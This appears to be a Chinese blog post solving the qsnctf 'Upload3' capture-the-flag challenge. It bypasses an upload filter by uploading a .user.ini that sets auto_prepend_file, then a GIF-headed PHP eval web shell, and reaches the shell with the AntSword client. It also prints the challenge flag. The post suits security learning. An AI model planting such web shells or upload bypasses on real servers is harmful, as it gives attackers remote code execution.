青少年CTF练习平台～Upload3

Hacker_seagull2026-01-18 17:18

目录

题目链接

https://www.qsnctf.com/

一、题目介绍

这次我学聪明啦！老板说要对上传点进行php的大小写过滤！这下看你怎么办！

二、上传.user.ini文件

bash 复制代码

auto_prepend_file=shell.png

上传成功

三、上传图片马（shell.png）

bash 复制代码

GIF89a
<?php @eval($_POST['cmd']);?>

上传成功

四、访问首页文件

当访问 index.php 时，PHP 引擎启动，读取目录下的 .user.ini，发现配置要求先加载 sell.png，于是它会先执行 shell.png 里的恶意代码，再执行首页原本的代码。

五、连接蚁剑

启动蚁剑连接shell(pass:cmd)

http://challenge.qsnctf.com:33578/index.php

连接成功

flag在根目录

flag{8ebfefb382d94eed9e1ef57e401492e7}

上一篇：某海外上报接口 strData 纯算逆向

下一篇：EasyExcel（FastExcel）Excel导出功能技术文档

热门推荐

01GitHub 镜像站点 02【OpenClaw 本地实战 Ep.3】突破瓶颈：强制修改 openclaw.json 解锁 32k 上下文记忆 03OpenClaw 使用和管理 MCP 完全指南 04Clawdbot部署教程：解决‘gateway token missing’授权问题的完整步骤 05OpenClaw + 飞书（Feishu）环境搭建指南 06Claude Code + GLM4.7 避坑指南：解决 Unable to connect to Anthropic services 07AI 规范驱动开发“三剑客”深度对比：Spec-Kit、Kiro 与 OpenSpec 实战指南 08Window 10部署openclaw报错node.exe : npm error code 128 09AI Agent 平台横评：ZeroClaw vs OpenClaw vs Nanobot 10OpenClaw优化飞书API 额度已耗尽问题